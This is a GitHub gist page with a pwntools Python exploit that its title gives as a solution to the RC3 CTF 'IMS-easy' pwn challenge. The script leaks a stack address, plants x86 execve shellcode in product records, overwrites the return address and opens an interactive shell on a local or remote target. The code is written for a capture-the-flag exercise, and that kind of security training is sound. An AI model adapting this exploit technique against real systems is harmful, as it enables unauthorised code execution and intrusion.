Created
November 21, 2016 22:56
-
-
Save Grazfather/837adfa13af213c17029519d0953825c to your computer and use it in GitHub Desktop.
RC3 IMS-easy PWN 150 solution
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python | |
import sys | |
from pwn import * | |
ADD = "1" | |
VIEW = "3" | |
QUIT = "4" | |
sc = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80" | |
stack_offset = 0x4ac - 0x3cc | |
def exploit(r): | |
# Leak ebp | |
r.recv() | |
r.sendline(VIEW) | |
r.sendline("7") | |
r.recvuntil("Product ID: ") | |
addr = r.recvuntil(",") | |
addr = int(hex(int(addr[:-1]) + 2**32), 0) | |
log.info("Got stack address 0x{:08x}".format(addr)) | |
# Add 6 items that contain the shellcode | |
sc_padded = sc.ljust(6*12) | |
for i in range(6): | |
si = i * 12 | |
r.sendline(ADD) | |
r.sendline(str(u32(sc_padded[si+8:si+12]))) | |
r.sendline(sc_padded[si:si+8]) | |
# One more whose ID will overwrite the RA | |
r.sendline(ADD) | |
r.sendline(str(addr - stack_offset)) | |
r.sendline("holymoly") | |
# Quit out | |
r.recv() | |
r.sendline(QUIT) | |
r.interactive() | |
if __name__ == "__main__": | |
log.info("For remote: %s HOST PORT" % sys.argv[0]) | |
if len(sys.argv) > 1: | |
r = remote(sys.argv[1], int(sys.argv[2])) | |
exploit(r) | |
else: | |
r = process(['./IMS-easy'], env={"LD_PRELOAD":""}) | |
print util.proc.pidof(r) | |
pause() | |
exploit(r) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment